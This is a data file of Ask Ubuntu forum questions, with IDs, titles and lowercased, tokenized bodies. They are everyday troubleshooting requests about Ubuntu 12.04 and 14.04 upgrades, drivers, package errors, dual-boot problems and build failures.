520718	`` no public key available '' while upgrading using update-manager	i decided to upgrade 12.04 to ubuntu 14.04 . i followed ... sudo update-manager -d then it 's opening the update-manger gui . then i clicked upgrade button this time error is throwing ... w : there is no public key available for the following key ids : 3b4fe6acc0b21f32 , w : there is no public key available for the following key ids : 3b4fe6acc0b21f32 , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-backports/main/source/sources 404 not found [ ip : 91.189.91.13 80 ] , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-backports/restricted/source/sources 404 not found [ ip : 91.189.91.13 80 ] , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-backports/universe/source/sources 404 not found [ ip : 91.189.91.13 80 ] , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/natty-backports/multiverse/source/sources 404 not found [ ip : 91.189.91.13 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . how to resolve this issue. ? edited : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04 lts release : 12.04 codename : precise
520719	intel 82579v network card not detected on every startup	recently i switched to ubuntu , but i am having most irritating problem with my network card . every time i starts my pc it never detect my network card so i have to restart pc and after restarting everything works fine . this problem occurs when i switch off my pc and than switch on . after restarting the problem fixed automatically . this same problem also occurs in windows 8 but in windows 8 i go to device manager and simply click on re scan button or disable/enable network card and it got fixed . but with ubuntu i have do restart my pc at-least once after switching on . here are details about my pc processor : i3 mother board : intel dh61ww network card : intel 82579v gigabit network os : ubuntu 14.04 lts please help me to fix this problem . i
520722	tying to install the latest scratch on 14.04	i get the stuff below in the terminal and do not see scratch in my menus . n107 : ~ $ sudo apt-get install scratch-text-editor reading package lists ... done building dependency tree reading state information ... done scratch-text-editor is already the newest version . the following packages were automatically installed and are no longer required : fonts-dejavu-extra icedtea-netx-common kde-l10n-engb libbaloocore4 libbaloofiles4 libbalooxapian4 libbonobo2-0 libbonobo2-common libepub0 libgconf2-4 libgnome2-0 libgnome2-bin libgnome2-common libhsqldb1.8.0-java libidl-common libidl0 libkactivities-models1 libkidletime4 libnepomukcleaner4 libnepomukcore4abi1 liborbit-2-0 liborbit2 libqmobipocket1 libreoffice-base-drivers libreoffice-sdbc-firebird libreoffice-sdbc-hsqldb libservlet3.0-java libzip2 linux-image-3.13.0-24-generic linux-image-3.13.0-33-generic linux-image-extra-3.13.0-24-generic linux-image-extra-3.13.0-33-generic nepomuk-core-data nepomuk-core-runtime shared-desktop-ontologies tzdata-java use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . billn @ billn-n107 : ~ $
520727	# include < qapplication.h > not found	when i try to run my first program in qt i get the fellowing error code /untitled1/main.cpp:1:26 : fatal error : qapplication.h : no such file or directory # include ^ compilation terminated . make : * [ main.o ] error 1 09:38:51 : the process `` /usr/bin/make '' exited with code 2 . error while building/deploying project untitled1 ( kit : desktop ) when executing step 'make ' 09:38:52 : elapsed time : 00:01. help me solve it ... .
520728	wubi uninstallation 12.04.3	i installed ubuntu 12.04.3 from usb stick inside windows 7 as it asked for three options to install inside windows to install as its primary os to do something else i chose to install inside windows 7 . installation was complete but it does n't show any partition or drive of ubuntu in the c : drive of windows 7 . even though i can see that my c : drive partition as being reduced to size as used by ubuntu now that i want to uninstall . i ca n't because i ca n't see the ubuntu drive in the windows 7 and nor can i access the uninstaller . i have also tried to run the uninstaller which is available at the site but it does not do anything . please help how do i uninstall ubuntu from the windows 7 .
520729	can i redistribute my remix of ubuntu ?	so let 's say i have a ubuntu remix that has nothing changed to the source code ( maybe just a few programs that originally shipped with it are removed . ) also has kde or gnome as a desktop environment and all ubuntu logos and brands are removed . lastly , i have some software that has gplv3 and apache licence 2.0 . can i redistribute that remix ?
520730	dvd writer does n't work , no usb driver available	first off , i 'm new to this , so bear with me . i 'm a regular home pc user , not a developer or it guru or computer whiz . trying to get and use ubuntu for the first time . downloaded it . great . did n't realize that i had to use the dvd writer on my computer , which gave up for some reason about six months ago . i have no usb drive available . i have a moto x , unrooted , uncustomized , nothing fancy , as it came in the box from the factory , except for nova launcher and a keyboard . my laptop is a toshiba satellite c655 . cheap walmart special . is there any way i can try to use my phone to install ubuntu on my laptop , or would it just be best to just go get a flash drive tomorrow ?
520731	will chkdsk ( repair ) on windows 8.1 affect ubuntu installed alongside ?	i recently upgraded my ubuntu 12.04lts which was installed alongside windows 8.1 to ubuntu 14.04lts , maybe its due to that , that windows have been acting stupidly , mainly the everything the computer is running will not respond after being idle and i 'm always forced to force shut down it whenever it happens on windows 8.1 , i 've already tried running boot-repair on ubuntu but no cigar , the problem still persists so yea i wan na do check disk repair ( chkdsk /f /r ) on windows ( that was what the support guy from the windows community suggested me to do , i think he missed the part where i said i had ubuntu installed alongside , because he did n't assure me that nothing will happen to ubuntu if i do that ) the question is will it affect my ubuntu ?
520732	old hard drive login fail	ok . i had ubuntu 10.10 and my pc motherboard crapped out on me took me a long time to get another system . its used compaq i put this old hard drive in.. now its asking me for log in and password.. i only remember ever using one . very simple . but its failing over and over again . isnt there a password recovery or some thing > ? im not getting a command line.. just the log in and password . ive tried a dozen variations.. and its all failing .. there are only 5 tries.. then fail . so.. i want my old data back.. and i am at a loss as to how to recover it . i promise its my hard drive.. but i cant seem to prove it to the damn machine .
520733	full screen magnifier for ubuntu	i have just started using ubuntu from windows . i have some visual problems . on windows i used windows default magnifier in full screen mode . i tried looking on for something similar but was unable to find . please tell me if there is any application for ubuntu which would work exactly like the ones on windows .
520734	spy wake up on lan packages	i have a windows computer which trunes on by magic i had long time no clue why this happens until i found the command powercfg -lastwake which told me that my nic woke up the computer . the wired part is that i did not send a wol package . so i want to know the source . here comes the linux part : do you guys know a way to collect only wol packages ? i think that is possible with tcpdump , but i 'm not sure how i can filter wol packages and how i can run this on my raspberrypi as a deamon . do you have an idea how to achieve that ? in best case i would like to have a log file which contains the source/target mac and the time .
520737	install sites using virtualmin but ftp ( proftp server , filezilla client ) upload failed	i used virtualmin to creat multi sitex on a vps ( ubuntu 14 lts ) . everything is ok except when i try to upload and try to update a file ( former files on the vps are scp from another vps ) it always reports 550 somepage.html : permission denied error : critical file transfer error status : disconnected from server even public_html set to chmod 777 when i try to set the a file filezilla ftp reports your comment welcome
520738	what is mount point at network file system ?	while reading about linux i got the following.. before you can start using a filesystem , you need to mount it to the filesystem tree at a mount point . this is simply a directory ( which may or may not be empty ) where the filesystem is to be attached ( mounted ) . sometimes you may need to create the directory if it does n't already exist . **warning : if you mount a filesystem on a non-empty directory , the former contents of that directory are covered-up and not accessible until the filesystem is unmounted . thus mount points are usually empty directories . ** now after some pages i encountered another phrase saying.. using nfs ( the network filesystem ) is one of the methods used for sharing data across physical systems . many system administrators mount remote users ' home directories on a server in order to give them access to the same files and configuration files across multiple client systems . this allows the users to log in to different computers yet still have access to the same files and resources . i am new to this flavor , and i am curious about certain things.. are servers have the same file system hierarchy as we have , when we install ubuntu ( suppose 14.04 lts ) when network administrator mount remote users home directories on server , where does they mount them ? isn , t the directory where they mount will be covered up , , how to do the permanent mount , as i read ( if you want it to be automatically available every time the system starts up , you need to edit the file /etc/fstab accordingly ) , list item
520740	ubuntu asks for wifi password during startup even though it remembers it	i am using ubuntu 14.04 lts and i have a problem with my wifi . its not really a big deal , but its annoying . i got asked for my wifi login credentials during each startup even though ubuntu remembers my username login and password . this happens even before i login into the system . and it does not even matter wheter i enter the wifi password of not . if i just click `` cancel '' on that dialog and then login to the system , its going to connect to the wifi anyway ( automatically ) . i am just trying to get rid og the dialog . any tips ?
520741	is it possible to forward windows ... windows into linux ? ( like unity/seamless or xypher )	if this is a `` bad question '' or otherwise something you mods want to close ... please at least direct me somewhere that could answer it , because that kind of thing happens to me a lot and i end up being stuck ... for instance - i know how to use ssh to forward x windows with ... ssh -y -p xxxx user @ localhost which forwards the users xinstances to my window . i was wondering if anyone has gotten really clever and found a way to draw windows windows in a framebuffer or in wine or something , so that i could use gnome/unity/k desktop managers for windows apps ... come to think of it , does windows have a `` kind of '' xypher [ thinks about run with credentials ]
520742	sharing mobile broadband connection through datacable on android device	okay so i baught a new android device with kitkat and i 'm using ubuntu 14.04 lts with an lte device connected as a mobile broadband . i do have a 3g connection on my cell though but when i was browsing through the settings of my device , there i found a usb internet option for the instance . in its description it was listed that i could use my windows internet connection with this device . well i was willing to share 4g speed with this device of mine and so i tried to connect my device with ubuntu in the same way . but i failed in doing so , and after hours of disappointment i 'm posting this question . so if anyone knows how to share mobile broadband with my android device , then please do let me know . and yeah thanks in advance . : )
520744	how do i install over an encrypted disk ?	i got a new ( old ) laptop , and was excited to try something new . so i gave zorin os a shot . however the initial charm wore off and i decided to move to ubuntu ( or maybe mint ? ) . but when i installed zorin i encrypted the full drive . so do i need to make any special considerations , or can i just do a clean install and call it good ? i 've seen some recommendations for decrypting the disk first , but ( 1 ) it sounds like a lot of work , and ( 2 ) i have nothing sensitive on the fresh install of zorin to lose . if it 's better to decrypt the drive then i 'll do it . but i 'd rather cut my losses and move on . also as a side note , do i need any special considerations installing over a previous distro ? again , i do n't want to save any folders or files . just do a clean install . edit : solved . i just did a clean install and it went swimmingly . now on ubuntu 14.04 without a hitch !
520745	battery meter only appears when laptop gets plugged in	the battery meter refuses to show unless i plug the laptop in . if i remove the applet and then re-add it it still wo n't show . i am using mint 17 and here is the screen shot of my power settings and i do n't have any battery status option in it : any ideas ?
520749	perl library error while installing ncurses	i am using ubuntu 14.04 and trying to install ncurses library . i had installed perl prior to this . but i am getting the following error while running make . /usr/bin/ld : /usr/local/lib/perl5/5.18.2/x86_64-linux/core/libperl.a ( op.o ) : relocation r_x86_64_32s against `pl_sv_yes ' can not be used when making a shared object ; recompile with -fpic /usr/local/lib/perl5/5.18.2/x86_64-linux/core/libperl.a : error adding symbols : bad value collect2 : error : ld returned 1 exit status make [ 3 ] : *** [ perl.la ] error 1 make [ 3 ] : leaving directory `/home/dell/desktop/ekg2-0.3.1/plugins/perl' make [ 2 ] : *** [ all-recursive ] error 1 make [ 2 ] : leaving directory `/home/dell/desktop/ekg2-0.3.1/plugins' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/dell/desktop/ekg2-0.3.1' make : *** [ all ] error 2 any solution for this ? ?
520753	apt and ubuntu software center ca n't install or remove any software	$ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : libstdc++6 : depends : gcc-4.9-base ( = 4.9.1-12 ) but 4.9-20140406-0ubuntu1 is installed breaks : libstdc++6 : i386 ( ! = 4.9.1-12 ) but 4.8.2-19ubuntu1 is installed libstdc++6 : i386 : breaks : libstdc++6 ( ! = 4.8.2-19ubuntu1 ) but 4.9.1-12 is installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies $ dpkg -l | grep 'libstdc++6' ru libstdc++6 : amd64 4.9.1-12 amd64 gnu standard c++ library v3 rf libstdc++6 : i386 4.8.2-19ubuntu1 i386 gnu standard c++ library v3
520757	ethernet network disconnected - wireless working	i experience a problem after a i moved in to my new home . i connect to internet through a router . wireless is working just fine , but wired network is disconnected ( ofcourse i plugged in the cable ) : ) . i experienced this problem in other distros also . in windows it is working ( not advertising ) . please help !
520759	how often is the time/date updated automatically ?	i am running ubuntu 14.04 32-bit in a vmware vm . i suspended the vm for a weak and then resumed it . i noticed that the time/date was incorrect , likely due to the fact that it was still set to the time and date when the vm got suspended . however , after a few hours of use the time was still the same . how often does the date/time get checked when ubuntu is set to do it automatically ? note : this question was changed from the original which was about setting the date/time . for some reason i was being locked out of manually changing the date/time through the gui . the button [ unlock to change these settings ] that allows a manual change would not unlock . that issue went away .
520760	mount bitlocker tpm partition	my plan is to encrypt my windows system with bitlocker ( and tpm ) . but i wonder if i 'm able to mount the system with linux . i know linux is able to mount bitlocker partitions but is it also able to mount partitions encrypted with the use of a tpm ?
520761	help with install on a non working windows compter	how do i install ubuntu on a non working windows computer ? ? as in my windows wont start cause it says its a illegal copy and boots down before i can install ubuntu ...
520763	apt-get upgrade gives 'failed : connection timed out ' , how to fix this ?	apt-get upgrade command giving error : connecting to archive.getdeb.net ( archive.getdeb.net ) |144.76.200.19|:80 ... failed : connection timed out . i gave the ping command , as follows : : ping archive.getdeb.net and got the output : : ping archive.getdeb.net ( 144.76.200.19 ) 56 ( 84 ) bytes of data . but after that it is remaining idl . and when i stopped the command using ctrl+c , it showed following : : -- - archive.getdeb.net ping statistics -- - 465 packets transmitted , 0 received , 100 % packet loss , time 464041ms does that mean that , the server is down .
520764	error - unable to find a medium containing a live file system	this appears for busybox on trying to install ubuntu 14.04 . my computer specs are nvida 660 ti 2gb , 8 gb ram , 2tb hdd , amd fx8320 . tried everything . running win 8 tried switching from yumi to unetbootin usb 3.0 to 2.0 2 different flash drives new partition legacy boot usb 1st to boot uefi boot checked sum5 any other suggestions ?
520765	what is the most stable ubuntu release for lenovo ideapad s110 ?	i want to dual boot my netbook lenovo ideapad s110 ( currently has windows 7 in it ) with ubuntu . i will use my ubuntu os mainly just for compiling and assembling codes . i do n't plan to use it for other applications so my question is which ubuntu release is the most stable for it ? i tried installing ubuntu 12.10 and it troubled me with the `` stopping save kernel messages '' problem upon boot-up so i removed it ( saw some posts here that suggests that what 's causing it is the unsupported gma3600 drivers ) . anyway here are my specs : lenovo ideapad s110 processor : intel atom n2800 video : intel gma 3600 ram : 2gb ram ddr3 sorry i do n't know which other specs to put or what other information to tell.total ubuntu noob here . so if ever you need any more additional information , just tell me and i 'll do my best to answer it . i am desperate for help because i really need ubuntu for school stuff .
520766	matlab startup error ubuntu 14.04	i 'm trying to run /usr/local/matlab/r2012a/bin/matlab on ubuntu 14.04 , but on startup it gives me the following error message : exception in thread `` main '' java.lang.noclassdeffounderror : org/apache/axis2/databinding/adbbean at java.lang.classloader.defineclass1 ( native method ) at java.lang.classloader.defineclass ( unknown source ) at java.security.secureclassloader.defineclass ( unknown source ) at java.net.urlclassloader.defineclass ( unknown source ) at java.net.urlclassloader.access $ 000 ( unknown source ) at java.net.urlclassloader $ 1.run ( unknown source ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( unknown source ) at sun.misc.launcher $ extclassloader.findclass ( unknown source ) at java.lang.classloader.loadclass ( unknown source ) at java.lang.classloader.loadclass ( unknown source ) at java.lang.classloader.loadclassinternal ( unknown source ) at com.mathworks.mlwebservices.controllingproductprovider.getcontrollingproducts ( controllingproductprovider.java:11 ) at com.mathworks.mlwebservices.defaultactivationservice. < init > ( defaultactivationservice.java:34 ) at com.mathworks.activationclient.activationapplication.createactivationservice ( activationapplication.java:205 ) at com.mathworks.activationclient.activationapplication. < init > ( activationapplication.java:194 ) at com.mathworks.activationclient.activationapplication.main ( activationapplication.java:144 ) caused by : java.lang.classnotfoundexception : org.apache.axis2.databinding.adbbean at java.net.urlclassloader $ 1.run ( unknown source ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( unknown source ) at sun.misc.launcher $ extclassloader.findclass ( unknown source ) at java.lang.classloader.loadclass ( unknown source ) at java.lang.classloader.loadclass ( unknown source ) at java.lang.classloader.loadclassinternal ( unknown source ) ... 17 more i 'm not sure how to debug this problem . any suggestions ? if it 's applicable , i 'm running /usr/lib/jvm/java-7-openjdk-i386/jre/bin/java . thanks !
520767	wine not seeing kobo ereader	i have just upgraded from ubuntu 12.04 to 14.04 and re-installed wine . when i run adobe digital editions it does not see my kobo ereader on /peter/media/koboereader . it was working in 12.04 . any suggestions please ?
520771	nokia lumia 520 ca n't get to work on ubuntu 14.04	i have a nokia lumia 520 and i ca n't get it to work with ubuntu . i love using my music and i am trying to transfer files over to listen to . is there anyway to get a windows phone working with linux ?
520773	i forgot admin pass on my think pad and nothing is helping me !	i am in the gnu grub now . i see 4 options ubuntu , advanced options for ubuntu , memory test , memory test with a bunch of numbers after it . i found out how to finally get in to recovery mode after hours ! ! but it still will not let me change pass ! ! ! i have even looked into trying to boot as a single user . god only knows what that will do . i have access to internet , threw a ethernet , which is very annoying on my laptop ! ! i really only need pass for upgrades or for disk usage and wifi . i 've been at this for days . was even told to try to change the time ! i do not need any files , is there a hard reset ? i do not have the start up disk though . is there anyone who can help ? i am extremely fed up right now with ubuntu ...
520775	motherboard and graphics driver	i have installed ubuntu on my new motherboard , all i have is motherboard support cd for windows platform . from community forums i understood in linux there is no need to install specific drivers . i have installed motorbike game from ubuntu sofwtare centre but the graphics is so sluggish that i cant even play . is there any need to install motherboard driver , if yes then how ?
520777	ubuntu 14.04 after suspend screen becomes unresponsive to keyboard and mouse	i have dual boot , ubuntu 14.04 and windows 8 , on my lenovo z585 . i forgot to lock system and left it as it is for half an hour . after that when i tried to access my system , the screen was unresponsive to keyboard as well as mouse . after hardboot , when i restarted my system , now on selecting ubuntu it shows ubuntu system startup screen and screen goes blank automatically . this remains unresponsive for both keyboard and mouse . but ubuntu login screen background sound can be heard when login screen is loaded but not shown anything on screen . tried restarting system several times , but the same issue persists . i can not see anything other than blank screen . when i try to hard boot i could see ubuntu login screen for a fraction of second and it goes blank due to hard stop . looks like though my ubuntu is booting proparly , somewhere screen is getting suspend signal causing screen to go blank . same happens when i boot in windows 8 .
520778	how can i change directories in the terminal ?	i have been googling how to use the terminal in ubuntu 14.04 . many years ago , i could find my way around dos , albeit i 'm a bit rusty . it seems that it 's basically similar but when i try to change directory all i get is no such file or directory . this happens on every cd command i tried . i even followed youtube videos and still no joy . is there an app i need to install first ? i want to install tarz files i have downloaded but i still want to be able to use the terminal for other things .
520779	games from facebook wont work , help ?	i want to play games on facebook and some games keep saying i need to have microsoft or mac . is there anything i can do to be able to play these games ? thanks in advance
520781	fresh install of 14.04 server edition does n't boot	i 've installed ubuntu 14.04 server , but on power-up i get the error message `` reboot and select proper boot device '' , even though i 've set boot priorities correctly . the server is going to be a nas . it has 5x 3tb hdds configured as a raid5 array through mdadm , which is partitioned as one large ext4 partition which is mounted as root . each drive has a 1mb biosgrub partition as well as a ~3tb raid partition . there 's no swap - the box has 16gb of ram which should be more than enough . i 've tried boot-repair , which reported success and pointed me to http : //paste.ubuntu.com/8268096/ , but the error message persists . motherboard is an asrock h97m pro4 , running the latest firmware ( 1.20 ) . boot order configuration photo .
520783	microsoft silverlight problems on ubuntu	i searched high and low and faffed around trying to get silverlight to work . i found this fix on an external site and thought i would share it here , so next time i reinstall ubunte i can easily find it and maybe it might help other people get silverlight working . how to run silverlight on your ubuntu machine : pipelight is a plugin that lets you view silverlight videos in a browser in ubuntu . here 's how you can install it . open a terminal window . type in the following commands then hit enter after each . sudo add-apt-repository ppa : pipelight/stable sudo apt-get update sudo apt-get install pipelight sudo pipelight-plugin -- update sudo pipelight-plugin -- enable silverlight pipelight project team is focuing on flash , silverlight , shockwave and the unity webplayer . in order to run silverlight dll in the linux this project needs a patched version of winehq , which is downloaded automatically during pipelight installation . using pipelight plugins in linux you can use services such as : netflix and so on .
520784	ubuntu 14.04 - lenovo ultrabook touchpad drag not working	suddenly i 'm unable to drag and drop with the touchpad on my lenovo u410 . all the other features such as scroll , right click ( two finger tap ) and left click work . i 'm using ubuntu 14.04 i tried using touchpad-indicator to troubleshoot but that did n't work . how do i troubleshoot this drag and drop ? i ca n't even drag and select text .
520785	understand mozilla thunderbird folders in ubuntu	i want to delete all files which are in the `` outgoing '' and `` drafts '' folder of a certain email ( imap ) account in my thunderbird . obviously it will by located in the /home/username/.thunderbird folder . but where exactly ? the background of my question is the following : i accidentally put the wrong recipient in my email , a recipient which under no circumstances should read this mail . while sending i noticed this accident and quickly clicked `` cancel '' and went offline . in my webmail interface the mail was in the drafts folder but not in the sent folder . so i hope it has not been sent . but i am afraid that locally it is still hanging somewhere in an `` outgoing '' or `` to be sent later '' folder . so before opening thunderbird again i would like to delete all such folders on my hard disk . therefore i have to know how these folders are called and where they are located . quick help appreciated . it is an urgent matter ! ! thx ! my os : ubuntu 13.10 here is how my imapmail folder looks like :
520787	uninstall ubuntu 12.04 3	i installed ubuntu 12.04.3 from usb stick inside windows 7 as it asked for three options to install inside windows to install as its primary os to do something else i chose to install inside windows 7 . installation was complete but it does n't show any partition or drive of ubuntu in the c : drive of windows 7 . even though i can see that my c : drive partition as being reduced to size as used by ubuntu now that i want to uninstall . i ca n't because i ca n't see the ubuntu drive in the windows 7 and nor can i access the uninstaller . i have also tried to run the uninstaller which is available at the site but it does not do anything . it does n't even show any entry in the control panel from we uninstall programs in windows 7 . please help how do i uninstall ubuntu from the windows 7
520795	14.04 lts dist-upgrade and missing options	since i upgrade my ubuntu box to 14.04 lts , i had some issues . apache , for example had become incompatible with his config files . only 2 of these issues remain now and i can not fix these myself : 1 ) i used to have a nice remote desktop icon in my top menu bar . it has disappeared and i can not access my box remotely anymore . it annoys me a lot as i use it as a server . 2 ) in the top right menu option ( that on/off/gear symbol ) , there used to be an option to perform the system updates . this option has now disappeared and i really miss that update app as it used to prompt me for a reboot whenever a kernel package was updated . so how may i get these important features back as they were a month ago ? thanks for your help mirko
520800	malware on ubunut lpmxp2150.com	hey guys i was watching a video on a flashplayer and everytime i do this a something pops up and recommends me to upgrade my video player . on behalf of lpmxp2150.com ... does anyone know this problem and can tell me how to solve this ? thank you
520803	update and installation of new software	today i download the ubuntu 14.04 lts and install it using pen drive . after installation internet is working fine but unable to update and install new software . every time error shown that check internet connection . please help me to solve this problem .
520804	there is a unknown initscript error when i use uck to customize ubuntu	the organization i am working for want to use ubuntu as the main systemďź when i use uck2.4.7 to costomize ubuntu 14.04.1 , there is a error as follows : ( reading database ... 165056 files and directories currently installed . ) preparing to unpack ... /libpam-systemd_204-5ubuntu20.5_i386.deb ... invoke-rc.d : unknown initscript , /etc/init.d/systemd-logind not found . dpkg : warning : subprocess old pre-removal script returned error exit status 100 dpkg : trying script from the new package instead ... invoke-rc.d : unknown initscript , /etc/init.d/systemd-logind not found . dpkg : error processing archive /var/cache/apt/archives/libpam-systemd_204-5ubuntu20.5_i386.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 100 /bin/df : '/sys/fs/cgroup/systemd ' : no such file or directory /bin/df : '/run/user/1000/gvfs ' : no such file or directory /bin/df : '/media/user/ba5c3fec5c3fa255 ' : no such file or directory /bin/df : '/home/user/livecdtmp/mnt ' : no such file or directory /bin/df : '/home/user/tmp/remaster-root/proc ' : no such file or directory /bin/df : '/home/user/tmp/remaster-root/sys ' : no such file or directory /bin/df : '/home/user/tmp/remaster-root/dev/pts ' : no such file or directory /bin/df : '/home/user/tmp/remaster-root/tmp ' : no such file or directory /bin/df : '/home/user/tmp/remaster-root/root ' : no such file or directory /bin/df : '/home/user/tmp/remaster-root/var/cache/apt ' : no such file or directory /bin/df : '/home/user/tmp/remaster-root/run ' : no such file or directory /bin/df : '/home/user/tmp/remaster-root/tmp/customization-scripts ' : no such file or directory invoke-rc.d : unknown initscript , /etc/init.d/systemd-logind not found . dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 100 preparing to unpack ... /systemd-services_204-5ubuntu20.5_i386.deb ... unpacking systemd-services ( 204-5ubuntu20.5 ) over ( 204-5ubuntu20.3 ) ... preparing to unpack ... /libsystemd-daemon0_204-5ubuntu20.5_i386.deb ... unpacking libsystemd-daemon0 : i386 ( 204-5ubuntu20.5 ) over ( 204-5ubuntu20.3 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have tried to change the $ home to /root , but there is no effect . how can i resolve this error .
520806	how to wipe off my whole hdd using ubuntu live usb	so i 've been getting some hdd errors , saying it may fail soon , best thing to make things better is to wipe everything off , so please lem me know how to : d
520808	`` system program problem detected '' error after updating nvidia drivers	i was trying to fix `` the system is running in low-graphics modeâ error . i updated my nvidia drivers and also reinstalled ubuntu-desktop . somehow i reached to the login screen . but after entering password it gives `` system program problem detected '' error and freezes . this whole problem was started when i installed xfce desktop enviornment . i tried a lot of answers from this page : - how to fix `` the system is running in low-graphics mode '' error ? but my problem is still not completely solved . how to solve this problem now .
520809	mint 17 vloopback make ca n't read private key , please check	sorry ... full command line , issue is i want install like `` make install '' i know i can use ppa , but this is not desigion : ( i try to do make vloopback but get error `` ca n't read private key '' how i can correct install this module ? ratamahata vloopback # ll total 84 drwxr-xr-x 2 root root 4096 вер 8 21:50 . drwxr-xr-x 3 root root 4096 вер 6 14:16 .. -rwxr-xr-x 1 root kentiq13 1665 гру 17 2013 libwebcamstudio.c -rwxr-xr-x 1 root kentiq13 1147 гру 17 2013 makefile -rw-r -- r -- 1 kentiq13 kentiq13 383 гру 17 2013 readme -rw-r -- r -- 1 root kentiq13 62076 вер 6 14:18 webcamstudio.c ratamahata vloopback # cat readme -- - install -- - log in as root and type : make & & make install -- - run -- - load the webcamstudio module as root : modprobe webcamstudio now you can feed the created device with data and fetch this data by any v4l2 capable program . try http : //code.google.com/p/v4lsink/ as source for video data . v4l1 should also work with little to no additional efforts ( effecttv still does not ) . ratamahata vloopback # make building webcamstudio kernel module ... make -c /lib/modules/3.13.0-24-generic/build m=/root/tmp/vloopback modules make [ 1 ] : entering directory /usr/src/linux-headers-3.13.0-24-generic' cc [ m ] /root/tmp/vloopback/webcamstudio.o building modules , stage 2 . modpost 1 modules cc /root/tmp/vloopback/webcamstudio.mod.o ld [ m ] /root/tmp/vloopback/webcamstudio.ko make [ 1 ] : leaving directory/usr/src/linux-headers-3.13.0-24-generic' ratamahata vloopback # make install installing webcamstudio kernel module ... make -c /lib/modules/3.13.0-24-generic/build m=/root/tmp/vloopback modules_install make [ 1 ] : entering directory /usr/src/linux-headers-3.13.0-24-generic' install /root/tmp/vloopback/webcamstudio.ko ca n't read private key depmod 3.13.0-24-generic make [ 1 ] : leaving directory/usr/src/linux-headers-3.13.0-24-generic' depmod -a
520813	localhost:4567 url gets redirected to port 80	i am working with vagrant machines , and everything worked fine until i run this command : vagrant destroy -f & & vagrant up i expect that if i go into the browser and i type http : //localhost:4567 , i will be taken to my virtual machine , but after pressing enter , the url bar displays http : //localhost , which i am guessing means that i have been redirected to port 80 . to make sure i didnt make an error , i removed apache from the host , but i still get the same error . what could be happening here ? update : maybe this can give some insight : $ curl -v 127.0.0.1:4567 * rebuilt url to : 127.0.0.1:4567/ * hostname was not found in dns cache * trying 127.0.0.1 ... * connected to 127.0.0.1 ( 127.0.0.1 ) port 4567 ( # 0 ) > get / http/1.1 > user-agent : curl/7.35.0 > host : 127.0.0.1:4567 > accept : */* > < http/1.1 301 moved permanently < date : sat , 06 sep 2014 12:39:11 gmt * server apache/2.4.7 ( ubuntu ) is not blacklisted < server : apache/2.4.7 ( ubuntu ) < x-powered-by : php/5.5.9-1ubuntu4.3 < x-pingback : http : //sonsi.enriquemorenotent.com/xmlrpc.php < location : http : //127.0.0.1/ < content-length : 0 < content-type : text/html ; charset=utf-8 < * connection # 0 to host 127.0.0.1 left intact
520814	linux 12.04 upgrade to v14	i have a dual boot pc using grub which has windows 7 , windows xp , dos6.22 and ubuntu linux v12.04 installed . attempting to upgrade to v14 via the upgrade process within linux produced an error message saying system was not recognised and it did something to the windows 7 boot system which required an automatic repair . windows and v12.04 is still working . can anyone suggest a solution please ? . regards bob
520816	how to provide crt1.o and crti.o for lfs ?	i have tried to create linux distribution with linux from scratch website , everything went good until step 5.7 . glibc-2.19 but when i tried : $ lfs_tgt-gcc dummy.c i get : /tools/lib/gcc/i686-lfs-linux-gnu/4.8.2/../../../../i686-lfs-linux-gnu/bin/ld : can not find crt1.o : no such file or directory /tools/lib/gcc/i686-lfs-linux-gnu/4.8.2/../../../../i686-lfs-linux-gnu/bin/ld : can not find crti.o : no such file or directory so i google it for a while and i realize that debian changed some folder and i search for those files and i found theme in : /usr/libx32/ i realize from those searches that it happen with trying to compile 64 bit in 32 bit structures , and i should create virtual link of theme in : /tools/lib/gcc/i686-lfs-linux-gnu/4.8.2/ but when i did that i get : /tools/lib/gcc/i686-lfs-linux-gnu/4.8.2/crt1.o : file not recognized : file format not recognized in this step i really do n't know what to do next , how can i fix it ?
520818	shell command not asking for password inside while loop	i am trying to run .sh file to put certificate via keytool command in every jre/lib/security/cacert file described in ~/.java/deployment/deployment.properties file . # ! /bin/bash pattern=deployment\.javaws\.jre\ . [ 0-9 ] *\.path file=~/.java/deployment/deployment.properties sep='=' trail=lib/security/cacerts # traverse file line by line while read line ; do # if line matches pattern if printf % s\\n `` $ { line } '' | grep -q `` $ { pattern } '' ; then case $ line in ( * '' $ sep '' * ) # process line to get path for ../jre/lib/security/cacert file after= $ { line # * '' $ sep '' } ; resultpath= $ { after % ? ? ? ? ? ? ? ? } $ { trail } ; # this fails : no password asked and ioexception showed sudo bash -c keytool -import -v -trustcacerts -alias test-cert -file ./test.cer -keystore $ { resultpath } ; ; ; ( * ) ; ; esac fi done < `` $ file '' in line sudo bash -c keytool -import -v -trustcacerts -alias test-cert -file ./test.cer -keystore $ { resultpath } ; should be asking for passwords : 1st - admin password because of sudo and 2nd - keystore password . but when i run this script through bash ./script.sh , the shell asks only for admin password and no keystore has asked . as a result . i have this error : enter keystore password : keytool error : java.io.ioexception : keystore was tampered with , or password was incorrect java.io.ioexception : keystore was tampered with , or password was incorrect at sun.security.provider.javakeystore.engineload ( javakeystore.java:772 ) at sun.security.provider.javakeystore $ jks.engineload ( javakeystore.java:55 ) at java.security.keystore.load ( keystore.java:1214 ) at sun.security.tools.keytool.docommands ( keytool.java:885 ) at sun.security.tools.keytool.run ( keytool.java:340 ) at sun.security.tools.keytool.main ( keytool.java:333 ) caused by : java.security.unrecoverablekeyexception : password verification failed at sun.security.provider.javakeystore.engineload ( javakeystore.java:770 ) ... 5 more what should i do get asking for keystore password ?
